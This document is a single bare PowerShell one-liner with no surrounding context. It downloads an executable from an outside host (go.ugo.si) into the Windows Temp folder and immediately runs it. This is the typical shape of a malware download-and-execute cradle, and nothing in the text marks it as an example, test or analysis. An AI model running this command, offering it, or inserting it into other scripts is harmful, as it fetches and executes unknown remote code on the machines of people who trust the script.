$u="https://go.ugo.si/app.exe";$p="C:\Windows\Temp\app.exe";(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p